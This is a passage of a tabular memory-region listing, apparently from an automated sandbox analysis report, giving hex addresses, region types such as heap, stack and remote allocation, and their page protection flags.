trusted library allocation
|
page read and write
|
||
|
171D0230000
|
heap
|
page read and write
|
||
|
7FF886DDC000
|
trusted library allocation
|
page execute and read and write
|
||
|
7C20000
|
trusted library allocation
|
page read and write
|
||
|
18922EAD000
|
trusted library allocation
|
page read and write
|
||
|
2831E000
|
stack
|
page read and write
|
||
|
289E0000
|
trusted library allocation
|
page read and write
|
||
|
289A0000
|
trusted library allocation
|
page read and write
|
||
|
255DE000
|
stack
|
page read and write
|
||
|
33C0000
|
trusted library allocation
|
page read and write
|
||
|
7A10000
|
trusted library allocation
|
page read and write
|
||
|
778E000
|
stack
|
page read and write
|
||
|
171D01C9000
|
heap
|
page read and write
|
||
|
E10000
|
trusted library allocation
|
page read and write
|
||
|
289E0000
|
trusted library allocation
|
page read and write
|
||
|
7FF886FF0000
|
trusted library allocation
|
page read and write
|
||
|
2F4F000
|
stack
|
page read and write
|
||
|
25AFE000
|
stack
|
page read and write
|
||
|
18921675000
|
trusted library allocation
|
page read and write
|
||
|
171D027E000
|
heap
|
page read and write
|
||
|
77D7000
|
heap
|
page read and write
|
||
|
7FF886F70000
|
trusted library allocation
|
page read and write
|
||
|
171D0316000
|
heap
|
page read and write
|
||
|
1891F929000
|
heap
|
page read and write
|
||
|
65E437C000
|
stack
|
page read and write
|
||
|
6404AFF000
|
stack
|
page read and write
|
||
|
289B2000
|
trusted library allocation
|
page read and write
|
||
|
171D09C9000
|
heap
|
page read and write
|
||
|
171D027E000
|
heap
|
page read and write
|
||
|
A2DC000
|
heap
|
page read and write
|
||
|
289A0000
|
trusted library allocation
|
page read and write
|
||
|
171D039A000
|
heap
|
page read and write
|
||
|
DB85000
|
direct allocation
|
page execute and read and write
|
||
|
87C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
289C0000
|
trusted library allocation
|
page read and write
|
||
|
25940000
|
direct allocation
|
page read and write
|
||
|
282DF000
|
stack
|
page read and write
|
||
|
27C71000
|
heap
|
page read and write
|
||
|
7F380000
|
trusted library allocation
|
page execute and read and write
|
||
|
1891F770000
|
heap
|
page read and write
|
||
|
171CE290000
|
heap
|
page read and write
|
||
|
7FF887010000
|
trusted library allocation
|
page read and write
|
||
|
898E000
|
heap
|
page read and write
|
||
|
171D020C000
|
heap
|
page read and write
|
||
|
D185000
|
direct allocation
|
page execute and read and write
|
||
|
171D027E000
|
heap
|
page read and write
|
||
|
27C0D000
|
trusted library allocation
|
page read and write
|
||
|
171D018C000
|
heap
|
page read and write
|
||
|
289E0000
|
trusted library allocation
|
page read and write
|
||
|
A1F0000
|
direct allocation
|
page read and write
|
||
|
171D0389000
|
heap
|
page read and write
|
||
|
171CE5A0000
|
heap
|
page read and write
|
||
|
3320000
|
heap
|
page read and write
|
||
|
18921A61000
|
trusted library allocation
|
page read and write
|
||
|
1891F8B0000
|
heap
|
page read and write
|
||
|
893E000
|
stack
|
page read and write
|
||
|
26BE1000
|
trusted library allocation
|
page read and write
|
||
|
343E000
|
stack
|
page read and write
|
||
|
65E43FE000
|
stack
|
page read and write
|
||
|
7A9E000
|
stack
|
page read and write
|
||
|
289F0000
|
trusted library allocation
|
page read and write
|
||
|
27BE0000
|
trusted library allocation
|
page read and write
|
||
|
27F3C000
|
heap
|
page read and write
|
||
|
89EB000
|
heap
|
page read and write
|
||
|
18921E36000
|
trusted library allocation
|
page read and write
|
||
|
281BF000
|
stack
|
page read and write
|
||
|
171D0359000
|
heap
|
page read and write
|
||
|
18921E57000
|
trusted library allocation
|
page read and write
|
||
|
189318DB000
|
trusted library allocation
|
page read and write
|
||
|
65E493E000
|
stack
|
page read and write
|
||
|
1891F973000
|
heap
|
page read and write
|
||
|
7FF886F80000
|
trusted library allocation
|
page read and write
|
||
|
289B0000
|
trusted library allocation
|
page read and write
|
||
|
171D0AB5000
|
heap
|
page read and write
|
||
|
A325000
|
heap
|
page read and write
|
||
|
2575E000
|
stack
|
page read and write
|
||
|
18939BF5000
|
heap
|
page read and write
|
||
|
171D031A000
|
heap
|
page read and write
|
||
|
1BAA3600000
|
heap
|
page read and write
|
||
|
189399E0000
|
heap
|
page read and write
|
||
|
27BE6000
|
trusted library allocation
|
page read and write
|
||
|
3458000
|
trusted library allocation
|
page read and write
|
||
|
18921A75000
|
trusted library allocation
|
page read and write
|
||
|
28A00000
|
trusted library allocation
|
page read and write
|
||
|
289B0000
|
trusted library allocation
|
page read and write
|
||
|
7390000
|
direct allocation
|
page read and write
|
||
|
171D026B000
|
heap
|
page read and write
|
||
|
8980000
|
heap
|
page read and write
|
||
|
1BAA3425000
|
heap
|
page read and write
|
||
|
289A0000
|
trusted library allocation
|
page read and write
|
||
|
171D01EA000
|
heap
|
page read and write
|
||
|
171D09BC000
|
heap
|
page read and write
|
||
|
171D0203000
|
heap
|
page read and write
|
||
|
171CE389000
|
heap
|
page read and write
|
||
|
289F0000
|
trusted library allocation
|
page read and write
|
||
|
897C000
|
stack
|
page read and write
|
||
|
18921A6B000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D22000
|
trusted library allocation
|
page read and write
|
||
|
25BE1000
|
trusted library allocation
|
page read and write
|
||
|
289F0000
|
trusted library allocation
|
page read and write
|
||
|
171D0425000
|
heap
|
page read and write
|
||
|
C785000
|
direct allocation
|
page execute and read and write
|
||
|
171D0429000
|
heap
|
page read and write
|
||
|
171D0319000
|
heap
|
page read and write
|
||
|
289B0000
|
trusted library allocation
|
page read and write
|
||
|
AA0000
|
heap
|
page read and write
|
||
|
289B0000
|
trusted library allocation
|
page read and write
|
||
|
171D01A2000
|
heap
|
page read and write
|
||
|
6404CFB000
|
stack
|
page read and write
|
||
|
1BAA3390000
|
heap
|
page read and write
|
||
|
1891F8E0000
|
heap
|
page read and write
|
||
|
6404359000
|
stack
|
page read and write
|
||
|
27F1E000
|
heap
|
page read and write
|
||
|
289C0000
|
trusted library allocation
|
page read and write
|
||
|
D0C000
|
stack
|
page read and write
|
||
|
8617000
|
stack
|
page read and write
|
||
|
171D02B5000
|
heap
|
page read and write
|
||
|
7BB0000
|
trusted library allocation
|
page read and write
|
||
|
171D0222000
|
heap
|
page read and write
|
||
|
171D032B000
|
heap
|
page read and write
|
||
|
289C0000
|
trusted library allocation
|
page read and write
|
||
|
171D0380000
|
heap
|
page read and write
|
||
|
5723000
|
trusted library allocation
|
page read and write
|
||
|
25BC0000
|
trusted library allocation
|
page read and write
|
||
|
34D0000
|
trusted library allocation
|
page read and write
|
||
|
289A0000
|
trusted library allocation
|
page read and write
|
||
|
171D01C6000
|
heap
|
page read and write
|
||
|
171D0254000
|
heap
|
page read and write
|
||
|
1891F92D000
|
heap
|
page read and write
|
||
|
171D0270000
|
heap
|
page read and write
|
||
|
32BF000
|
heap
|
page read and write
|
||
|
28A30000
|
trusted library allocation
|
page read and write
|
||
|
331C000
|
heap
|
page read and write
|
||
|
289F0000
|
trusted library allocation
|
page read and write
|
||
|
8620000
|
heap
|
page read and write
|
||
|
171D01AE000
|
heap
|
page read and write
|
||
|
289C2000
|
trusted library allocation
|
page read and write
|
||
|
A2E3000
|
heap
|
page read and write
|
||
|
171D01B9000
|
heap
|
page read and write
|
||
|
BFE000
|
stack
|
page read and write
|
||
|
79A0000
|
trusted library allocation
|
page read and write
|
||
|
289E0000
|
trusted library allocation
|
page read and write
|
||
|
289E0000
|
trusted library allocation
|
page read and write
|
||
|
25C15000
|
trusted library allocation
|
page read and write
|
||
|
289F0000
|
trusted library allocation
|
page read and write
|
||
|
289A0000
|
trusted library allocation
|
page read and write
|
||
|
258B0000
|
remote allocation
|
page read and write
|
||
|
28A20000
|
trusted library allocation
|
page read and write
|
||
|
289C0000
|
trusted library allocation
|
page read and write
|
||
|
258EE000
|
stack
|
page read and write
|
||
|
171D0AB6000
|
heap
|
page read and write
|
||
|
171D036D000
|
heap
|
page read and write
|
||
|
289B0000
|
trusted library allocation
|
page read and write
|
||
|
27C01000
|
trusted library allocation
|
page read and write
|
||
|
7FF886ED1000
|
trusted library allocation
|
page read and write
|
||
|
27F20000
|
heap
|
page read and write
|
||
|
289E0000
|
trusted library allocation
|
page read and write
|
||
|
25ABC000
|
stack
|
page read and write
|
||
|
8C50000
|
trusted library allocation
|
page read and write
|
||
|
289B0000
|
trusted library allocation
|
page read and write
|
||
|
259F8000
|
stack
|
page read and write
|
||
|
28AE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7ADF000
|
stack
|
page read and write
|
||
|
171D035B000
|
heap
|
page read and write
|
||
|
171D0260000
|
heap
|
page read and write
|
||
|
571D000
|
trusted library allocation
|
page read and write
|
||
|
27C30000
|
trusted library allocation
|
page read and write
|
||
|
171D09BE000
|
heap
|
page read and write
|
||
|
18939E50000
|
heap
|
page read and write
|
||
|
64050FF000
|
stack
|
page read and write
|
||
|
950000
|
heap
|
page read and write
|
||
|
64047FE000
|
stack
|
page read and write
|
||
|
A2E3000
|
heap
|
page read and write
|
||
|
25B00000
|
trusted library allocation
|
page read and write
|
||
|
65E540E000
|
stack
|
page read and write
|
||
|
171D0334000
|
heap
|
page read and write
|
||
|
289D0000
|
trusted library allocation
|
page read and write
|
||
|
27F2D000
|
heap
|
page read and write
|
||
|
7FF887050000
|
trusted library allocation
|
page read and write
|
||
|
7FF886FA0000
|
trusted library allocation
|
page read and write
|
||
|
34C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
8C30000
|
trusted library allocation
|
page execute and read and write
|
||
|
A323000
|
heap
|
page read and write
|
||
|
289E0000
|
trusted library allocation
|
page read and write
|
||
|
171D034F000
|
heap
|
page read and write
|
||
|
171D0988000
|
heap
|
page read and write
|
||
|
289F0000
|
trusted library allocation
|
page read and write
|
||
|
1BAA3360000
|
heap
|
page read and write
|
||
|
189213D7000
|
heap
|
page execute and read and write
|
||
|
DD0000
|
heap
|
page read and write
|
||
|
65E3F0E000
|
stack
|
page read and write
|
||
|
289E0000
|
trusted library allocation
|
page read and write
|
||
|
28AF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
289F0000
|
trusted library allocation
|
page read and write
|
||
|
7B1E000
|
stack
|
page read and write
|
||
|
18939988000
|
heap
|
page read and write
|
||
|
7FF886DE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7320000
|
direct allocation
|
page read and write
|
||
|
171D018A000
|
heap
|
page read and write
|
||
|
171D0993000
|
heap
|
page read and write
|
||
|
189215E0000
|
heap
|
page execute and read and write
|
||
|
171CE2EA000
|
heap
|
page read and write
|
||
|
289C0000
|
trusted library allocation
|
page read and write
|
||
|
2823E000
|
stack
|
page read and write
|
||
|
3E01DFF000
|
stack
|
page read and write
|
||
|
18923433000
|
trusted library allocation
|
page read and write
|
||
|
89AD000
|
heap
|
page read and write
|
||
|
7450000
|
direct allocation
|
page read and write
|
||
|
289C0000
|
trusted library allocation
|
page read and write
|
||
|
72DD000
|
stack
|
page read and write
|
||
|
25C68000
|
trusted library allocation
|
page read and write
|
||
|
171D01B8000
|
heap
|
page read and write
|
||
|
289C0000
|
trusted library allocation
|
page read and write
|
||
|
18921E34000
|
trusted library allocation
|
page read and write
|
||
|
171D02C3000
|
heap
|
page read and write
|
||
|
7FF886DD6000
|
trusted library allocation
|
page read and write
|
||
|
65E4737000
|
stack
|
page read and write
|
||
|
1891F927000
|
heap
|
page read and write
|
||
|
289E0000
|
trusted library allocation
|
page read and write
|
||
|
7FF886EDA000
|
trusted library allocation
|
page read and write
|
||
|
1BAA3370000
|
heap
|
page read and write
|
||
|
171D0998000
|
heap
|
page read and write
|
||
|
28A00000
|
trusted library allocation
|
page read and write
|
||
|
27BEB000
|
trusted library allocation
|
page read and write
|
||
|
171D0248000
|
heap
|
page read and write
|
||
|
65E3EC3000
|
stack
|
page read and write
|
||
|
1891F96D000
|
heap
|
page read and write
|
||
|
28A20000
|
trusted library allocation
|
page read and write
|
||
|
289B0000
|
trusted library allocation
|
page read and write
|
||
|
171D027E000
|
heap
|
page read and write
|
||
|
A175000
|
heap
|
page read and write
|
||
|
289C1000
|
trusted library allocation
|
page read and write
|
||
|
7807000
|
heap
|
page read and write
|
||
|
A338000
|
heap
|
page read and write
|
||
|
289E0000
|
trusted library allocation
|
page read and write
|
||
|
171D099D000
|
heap
|
page read and write
|
||
|
171D03BB000
|
heap
|
page read and write
|
||
|
289D0000
|
trusted library allocation
|
page read and write
|
||
|
289A0000
|
trusted library allocation
|
page read and write
|
||
|
171CE2EB000
|
heap
|
page read and write
|
||
|
65E550A000
|
stack
|
page read and write
|
||
|
171D027E000
|
heap
|
page read and write
|
||
|
8C20000
|
trusted library allocation
|
page read and write
|
||
|
731B000
|
stack
|
page read and write
|
||
|
18939983000
|
heap
|
page read and write
|
||
|
289A0000
|
trusted library allocation
|
page read and write
|
||
|
289F0000
|
trusted library allocation
|
page read and write
|
||
|
289E0000
|
trusted library allocation
|
page read and write
|
||
|
171D02DE000
|
heap
|
page read and write
|
||
|
7B90000
|
trusted library allocation
|
page read and write
|
||
|
289C0000
|
trusted library allocation
|
page read and write
|
||
|
D48000
|
stack
|
page read and write
|
||
|
7872000
|
heap
|
page read and write
|
||
|
4DE0000
|
heap
|
page execute and read and write
|
||
|
28A00000
|
trusted library allocation
|
page read and write
|
||
|
327F000
|
stack
|
page read and write
|
||
|
171D09AB000
|
heap
|
page read and write
|
||
|
171D0436000
|
heap
|
page read and write
|
||
|
4460000
|
remote allocation
|
page execute and read and write
|
||
|
171D02C8000
|
heap
|
page read and write
|
||
|
171D036D000
|
heap
|
page read and write
|
||
|
171D0995000
|
heap
|
page read and write
|
||
|
289C0000
|
trusted library allocation
|
page read and write
|
||
|
171D034F000
|
heap
|
page read and write
|
||
|
289B0000
|
trusted library allocation
|
page read and write
|
||
|
189213D0000
|
heap
|
page execute and read and write
|
||
|
171D01ED000
|
heap
|
page read and write
|
||
|
7FF886DD0000
|
trusted library allocation
|
page read and write
|
||
|
7520000
|
heap
|
page read and write
|
||
|
28367000
|
trusted library allocation
|
page read and write
|
||
|
83D000
|
stack
|
page read and write
|
||
|
289F0000
|
trusted library allocation
|
page read and write
|
||
|
77C7000
|
heap
|
page read and write
|
||
|
A190000
|
direct allocation
|
page read and write
|
||
|
171D0371000
|
heap
|
page read and write
|
||
|
289D0000
|
trusted library allocation
|
page read and write
|
||
|
18921AE1000
|
trusted library allocation
|
page read and write
|
||
|
171D09C9000
|
heap
|
page read and write
|
||
|
171D0181000
|
heap
|
page read and write
|
||
|
64046FE000
|
stack
|
page read and write
|
||
|
171D04B3000
|
heap
|
page read and write
|
||
|
27ED2000
|
heap
|
page read and write
|
||
|
171D01C7000
|
heap
|
page read and write
|
||
|
171D023B000
|
heap
|
page read and write
|
||
|
28BDF000
|
stack
|
page read and write
|
||
|
27EE6000
|
heap
|
page read and write
|
||
|
1891F9F0000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D2D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7B80000
|
trusted library allocation
|
page read and write
|
||
|
27C30000
|
trusted library allocation
|
page read and write
|
||
|
171CE3AB000
|
heap
|
page read and write
|
||
|
7C30000
|
trusted library allocation
|
page read and write
|
||
|
4EEE000
|
stack
|
page read and write
|
||
|
171D0437000
|
heap
|
page read and write
|
||
|
323D000
|
stack
|
page read and write
|
||
|
171D098F000
|
heap
|
page read and write
|
||
|
E1E000
|
stack
|
page read and write
|
||
|
1891F8ED000
|
heap
|
page read and write
|
||
|
1891FA20000
|
heap
|
page readonly
|
||
|
7FF886E06000
|
trusted library allocation
|
page execute and read and write
|
||
|
A2D0000
|
heap
|
page read and write
|
||
|
27C06000
|
trusted library allocation
|
page read and write
|
||
|
18921817000
|
trusted library allocation
|
page read and write
|
||
|
7C00000
|
trusted library allocation
|
page read and write
|
||
|
27F3E000
|
heap
|
page read and write
|
||
|
7FF886F20000
|
trusted library allocation
|
page read and write
|
||
|
289F0000
|
trusted library allocation
|
page read and write
|
||
|
7BF0000
|
trusted library allocation
|
page read and write
|
||
|
7340000
|
direct allocation
|
page read and write
|
||
|
171D01DD000
|
heap
|
page read and write
|
||
|
33A4000
|
trusted library allocation
|
page read and write
|
||
|
2ED0000
|
trusted library allocation
|
page read and write
|
||
|
289E0000
|
trusted library allocation
|
page read and write
|
||
|
171D0359000
|
heap
|
page read and write
|
||
|
328C000
|
heap
|
page read and write
|
||
|
171D0281000
|
heap
|
page read and write
|
||
|
289E0000
|
trusted library allocation
|
page read and write
|
||
|
25C2D000
|
trusted library allocation
|
page read and write
|
||
|
A1C0000
|
direct allocation
|
page read and write
|
||
|
289C0000
|
trusted library allocation
|
page read and write
|
||
|
171D036D000
|
heap
|
page read and write
|
||
|
289F0000
|
trusted library allocation
|
page read and write
|
||
|
7BD0000
|
trusted library allocation
|
page read and write
|
||
|
18939942000
|
heap
|
page read and write
|
||
|
189233F1000
|
trusted library allocation
|
page read and write
|
||
|
289E0000
|
trusted library allocation
|
page read and write
|
||
|
289E0000
|
trusted library allocation
|
page read and write
|
||
|
7FF886F60000
|
trusted library allocation
|
page read and write
|
||
|
171D034F000
|
heap
|
page read and write
|
||
|
8C05000
|
remote allocation
|
page execute and read and write
|
||
|
171D0240000
|
heap
|
page read and write
|
||
|
171D0580000
|
heap
|
page read and write
|
||
|
18921415000
|
heap
|
page read and write
|
||
|
289B0000
|
trusted library allocation
|
page read and write
|
||
|
5A05000
|
remote allocation
|
page execute and read and write
|
||
|
171D036D000
|
heap
|
page read and write
|
||
|
171D035B000
|
heap
|
page read and write
|
||
|
289D0000
|
trusted library allocation
|
page read and write
|
||
|
79D0000
|
trusted library allocation
|
page read and write
|
||
|
171D02E1000
|
heap
|
page read and write
|
||
|
289A0000
|
trusted library allocation
|
page read and write
|
||
|
171D0653000
|
heap
|
page read and write
|
||
|
28A20000
|
trusted library allocation
|
page read and write
|
||
|
289B0000
|
trusted library allocation
|
page read and write
|
||
|
3E019CD000
|
stack
|
page read and write
|
||
|
289A0000
|
trusted library allocation
|
page read and write
|
||
|
171D01C6000
|
heap
|
page read and write
|
||
|
171D0273000
|
heap
|
page read and write
|
||
|
25C31000
|
trusted library allocation
|
page read and write
|
||
|
289E0000
|
trusted library allocation
|
page read and write
|
||
|
289F0000
|
trusted library allocation
|
page read and write
|
||
|
171D0581000
|
heap
|
page read and write
|
||
|
171D0487000
|
heap
|
page read and write
|
||
|
4E6E000
|
stack
|
page read and write
|
||
|
3E01CFF000
|
unkown
|
page read and write
|
||
|
8640000
|
heap
|
page read and write
|
||
|
34EB000
|
heap
|
page read and write
|
||
|
4CCC000
|
stack
|
page read and write
|
||
|
33D2000
|
trusted library allocation
|
page read and write
|
||
|
18939BE7000
|
heap
|
page read and write
|
||
|
8B80000
|
trusted library allocation
|
page read and write
|
||
|
2E40000
|
heap
|
page read and write
|
||
|
7A20000
|
trusted library allocation
|
page read and write
|
||
|
33D0000
|
trusted library allocation
|
page read and write
|
||
|
289A0000
|
trusted library allocation
|
page read and write
|
||
|
171D0334000
|
heap
|
page read and write
|
||
|
27C50000
|
trusted library allocation
|
page read and write
|
||
|
171D0233000
|
heap
|
page read and write
|
||
|
289B0000
|
trusted library allocation
|
page read and write
|
||
|
89C5000
|
heap
|
page read and write
|
||
|
7FF887020000
|
trusted library allocation
|
page read and write
|
||
|
257B0000
|
heap
|
page read and write
|
||
|
27BFE000
|
trusted library allocation
|
page read and write
|
||
|
171D09C9000
|
heap
|
page read and write
|
||
|
2559E000
|
stack
|
page read and write
|
||
|
7C10000
|
trusted library allocation
|
page read and write
|
||
|
27DFC000
|
stack
|
page read and write
|
||
|
7A07000
|
trusted library allocation
|
page read and write
|
||
|
25A3E000
|
stack
|
page read and write
|
||
|
171D037A000
|
heap
|
page read and write
|
||
|
65E48BE000
|
stack
|
page read and write
|
||
|
18939B73000
|
heap
|
page read and write
|
||
|
27C20000
|
trusted library allocation
|
page read and write
|
||
|
7FF886FE0000
|
trusted library allocation
|
page read and write
|
||
|
171D0372000
|
heap
|
page read and write
|
||
|
289A0000
|
trusted library allocation
|
page read and write
|
||
|
7FF887080000
|
trusted library allocation
|
page read and write
|
||
|
289C0000
|
trusted library allocation
|
page read and write
|
||
|
289B3000
|
trusted library allocation
|
page read and write
|
||
|
189233BC000
|
trusted library allocation
|
page read and write
|
||
|
171CE5A8000
|
heap
|
page read and write
|
||
|
171D028E000
|
heap
|
page read and write
|
||
|
289A0000
|
trusted library allocation
|
page read and write
|
||
|
18921E6C000
|
trusted library allocation
|
page read and write
|
||
|
289D0000
|
trusted library allocation
|
page read and write
|
||
|
171D019D000
|
heap
|
page read and write
|
||
|
171D0268000
|
heap
|
page read and write
|
||
|
8C10000
|
trusted library allocation
|
page read and write
|
||
|
18921407000
|
heap
|
page read and write
|
||
|
2ED2000
|
trusted library allocation
|
page read and write
|
||
|
7F710000
|
trusted library allocation
|
page execute and read and write
|
||
|
25B28000
|
trusted library allocation
|
page read and write
|
||
|
27BE4000
|
trusted library allocation
|
page read and write
|
||
|
5068000
|
trusted library allocation
|
page read and write
|
||
|
18939B30000
|
heap
|
page read and write
|
||
|
171D0181000
|
heap
|
page read and write
|
||
|
171D030C000
|
heap
|
page read and write
|
||
|
289E0000
|
trusted library allocation
|
page read and write
|
||
|
27C70000
|
heap
|
page read and write
|
||
|
171D0424000
|
heap
|
page read and write
|
||
|
64049FE000
|
stack
|
page read and write
|
||
|
27F3E000
|
heap
|
page read and write
|
||
|
189233B1000
|
trusted library allocation
|
page read and write
|
||
|
171D01A9000
|
heap
|
page read and write
|
||
|
9F85000
|
direct allocation
|
page execute and read and write
|
||
|
289E0000
|
trusted library allocation
|
page read and write
|
||
|
A270000
|
heap
|
page read and write
|
||
|
A210000
|
direct allocation
|
page read and write
|
||
|
171D0435000
|
heap
|
page read and write
|
||
|
1BAA3437000
|
heap
|
page read and write
|
||
|
171D027E000
|
heap
|
page read and write
|
||
|
7FF887040000
|
trusted library allocation
|
page read and write
|
||
|
171D0214000
|
heap
|
page read and write
|
||
|
7420000
|
direct allocation
|
page read and write
|
||
|
281FE000
|
stack
|
page read and write
|
||
|
4D5E000
|
stack
|
page read and write
|
||
|
74DD000
|
stack
|
page read and write
|
||
|
28360000
|
trusted library allocation
|
page read and write
|
||
|
171D01A9000
|
heap
|
page read and write
|
||
|
259A0000
|
trusted library allocation
|
page read and write
|
||
|
27E80000
|
heap
|
page read and write
|
||
|
289F0000
|
trusted library allocation
|
page read and write
|
||
|
7A50000
|
heap
|
page execute and read and write
|
||
|
7FF887030000
|
trusted library allocation
|
page read and write
|
||
|
171D0330000
|
heap
|
page read and write
|
||
|
27ED2000
|
heap
|
page read and write
|
||
|
289C0000
|
trusted library allocation
|
page read and write
|
||
|
33B0000
|
trusted library allocation
|
page read and write
|
||
|
289F0000
|
trusted library allocation
|
page read and write
|
||
|
8630000
|
trusted library allocation
|
page execute and read and write
|
||
|
289A0000
|
trusted library allocation
|
page read and write
|
||
|
289E0000
|
trusted library allocation
|
page read and write
|
||
|
27C30000
|
trusted library allocation
|
page read and write
|
||
|
5F11000
|
trusted library allocation
|
page read and write
|
||
|
7FF886F30000
|
trusted library allocation
|
page read and write
|
||
|
28A30000
|
trusted library allocation
|
page read and write
|
||
|
18921CA4000
|
trusted library allocation
|
page read and write
|
||
|
86CD000
|
stack
|
page read and write
|
||
|
65E42FE000
|
stack
|
page read and write
|
||
|
65E447E000
|
stack
|
page read and write
|
||
|
7FF886D24000
|
trusted library allocation
|
page read and write
|
||
|
171CE5AB000
|
heap
|
page read and write
|
||
|
171D0990000
|
heap
|
page read and write
|
||
|
27ECF000
|
heap
|
page read and write
|
||
|
289B0000
|
trusted library allocation
|
page read and write
|
||
|
289A0000
|
trusted library allocation
|
page read and write
|
||
|
A177000
|
heap
|
page read and write
|
||
|
33AD000
|
trusted library allocation
|
page execute and read and write
|
||
|
8730000
|
trusted library allocation
|
page read and write
|
||
|
18921A7D000
|
trusted library allocation
|
page read and write
|
||
|
171D0183000
|
heap
|
page read and write
|
||
|
A985000
|
direct allocation
|
page execute and read and write
|
||
|
258B0000
|
remote allocation
|
page read and write
|
||
|
1891FA75000
|
heap
|
page read and write
|
||
|
189233D7000
|
trusted library allocation
|
page read and write
|
||
|
18921E2C000
|
trusted library allocation
|
page read and write
|
||
|
171D01E2000
|
heap
|
page read and write
|
||
|
18939BB9000
|
heap
|
page read and write
|
||
|
1891F931000
|
heap
|
page read and write
|
||
|
6404FFB000
|
stack
|
page read and write
|
||
|
93D000
|
stack
|
page read and write
|
||
|
18922EAA000
|
trusted library allocation
|
page read and write
|
||
|
A9E000
|
unkown
|
page read and write
|
||
|
2580D000
|
stack
|
page read and write
|
||
|
1BAA3430000
|
heap
|
page read and write
|
||
|
89A9000
|
heap
|
page read and write
|
||
|
189318E9000
|
trusted library allocation
|
page read and write
|
||
|
2ED6000
|
trusted library allocation
|
page execute and read and write
|
||
|
980000
|
heap
|
page read and write
|
||
|
B385000
|
direct allocation
|
page execute and read and write
|
||
|
1891F850000
|
heap
|
page read and write
|
||
|
171D0433000
|
heap
|
page read and write
|
||
|
A32B000
|
heap
|
page read and write
|
||
|
1891F870000
|
heap
|
page read and write
|
||
|
25950000
|
direct allocation
|
page read and write
|
||
|
5774000
|
trusted library allocation
|
page read and write
|
||
|
289B0000
|
trusted library allocation
|
page read and write
|
||
|
171D0981000
|
heap
|
page read and write
|
||
|
171D09C9000
|
heap
|
page read and write
|
||
|
27C30000
|
heap
|
page read and write
|
||
|
289F0000
|
trusted library allocation
|
page read and write
|
||
|
171D0183000
|
heap
|
page read and write
|
||
|
2FA0000
|
heap
|
page read and write
|
||
|
2569D000
|
stack
|
page read and write
|
||
|
65E49BC000
|
stack
|
page read and write
|
||
|
8710000
|
heap
|
page read and write
|
||
|
171D01C7000
|
heap
|
page read and write
|
||
|
7BE0000
|
trusted library allocation
|
page read and write
|
||
|
18921405000
|
heap
|
page read and write
|
||
|
289F0000
|
trusted library allocation
|
page read and write
|
||
|
171CE260000
|
heap
|
page read and write
|
||
|
3440000
|
heap
|
page readonly
|
||
|
171D098D000
|
heap
|
page read and write
|
||
|
171D01E5000
|
heap
|
page read and write
|
||
|
289B0000
|
trusted library allocation
|
page read and write
|
||
|
289A0000
|
trusted library allocation
|
page read and write
|
||
|
171D04B4000
|
heap
|
page read and write
|
||
|
289E0000
|
trusted library allocation
|
page read and write
|
||
|
34E0000
|
heap
|
page read and write
|
||
|
171D01C1000
|
heap
|
page read and write
|
||
|
289A0000
|
trusted library allocation
|
page read and write
|
||
|
18939B69000
|
heap
|
page read and write
|
||
|
1892342F000
|
trusted library allocation
|
page read and write
|
||
|
A365000
|
heap
|
page read and write
|
||
|
289F0000
|
trusted library allocation
|
page read and write
|
||
|
1891FA10000
|
trusted library allocation
|
page read and write
|
||
|
171CE5AB000
|
heap
|
page read and write
|
||
|
7FF886EC0000
|
trusted library allocation
|
page read and write
|
||
|
7C8B000
|
stack
|
page read and write
|
||
|
7350000
|
direct allocation
|
page read and write
|
||
|
27C30000
|
trusted library allocation
|
page read and write
|
||
|
171D01F2000
|
heap
|
page read and write
|
||
|
7FF886FD0000
|
trusted library allocation
|
page read and write
|
||
|
7440000
|
direct allocation
|
page read and write
|
||
|
93E0000
|
direct allocation
|
page execute and read and write
|
||
|
89A0000
|
heap
|
page read and write
|
||
|
2EE5000
|
trusted library allocation
|
page execute and read and write
|
||
|
18922882000
|
trusted library allocation
|
page read and write
|
||
|
5005000
|
remote allocation
|
page execute and read and write
|
||
|
65E4579000
|
stack
|
page read and write
|
||
|
751B000
|
stack
|
page read and write
|
||
|
189233C0000
|
trusted library allocation
|
page read and write
|
||
|
27E88000
|
heap
|
page read and write
|
||
|
289A0000
|
trusted library allocation
|
page read and write
|
||
|
28A20000
|
trusted library allocation
|
page read and write
|
||
|
7DF4D02E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
A200000
|
direct allocation
|
page read and write
|
||
|
171D01FB000
|
heap
|
page read and write
|
||
|
33F0000
|
trusted library allocation
|
page read and write
|
||
|
289A0000
|
trusted library allocation
|
page read and write
|
||
|
2817D000
|
stack
|
page read and write
|
||
|
171D02E9000
|
heap
|
page read and write
|
||
|
18921400000
|
heap
|
page read and write
|
||
|
289C0000
|
trusted library allocation
|
page read and write
|
||
|
33A3000
|
trusted library allocation
|
page execute and read and write
|
||
|
171CE5A5000
|
heap
|
page read and write
|
||
|
171D042E000
|
heap
|
page read and write
|
||
|
7A40000
|
trusted library allocation
|
page read and write
|
||
|
2899E000
|
stack
|
page read and write
|
||
|
28A10000
|
trusted library allocation
|
page read and write
|
||
|
171D0653000
|
heap
|
page read and write
|
||
|
7330000
|
direct allocation
|
page read and write
|
||
|
189212C0000
|
trusted library allocation
|
page read and write
|
||
|
171D036D000
|
heap
|
page read and write
|
||
|
A220000
|
direct allocation
|
page read and write
|
||
|
171D09C2000
|
heap
|
page read and write
|
||
|
171D0985000
|
heap
|
page read and write
|
||
|
A170000
|
heap
|
page read and write
|
||
|
7430000
|
direct allocation
|
page read and write
|
||
|
171D09A5000
|
heap
|
page read and write
|
||
|
289A0000
|
trusted library allocation
|
page read and write
|
||
|
2592F000
|
stack
|
page read and write
|
||
|
3280000
|
heap
|
page read and write
|
||
|
2584E000
|
stack
|
page read and write
|
||
|
256DE000
|
stack
|
page read and write
|
||
|
171D0278000
|
heap
|
page read and write
|
||
|
2EE7000
|
trusted library allocation
|
page execute and read and write
|
||
|
289A0000
|
trusted library allocation
|
page read and write
|
||
|
171D020E000
|
heap
|
page read and write
|
||
|
26C43000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D3B000
|
trusted library allocation
|
page read and write
|
||
|
289C0000
|
trusted library allocation
|
page read and write
|
||
|
7FF886FB0000
|
trusted library allocation
|
page read and write
|
||
|
7FF886E40000
|
trusted library allocation
|
page execute and read and write
|
||
|
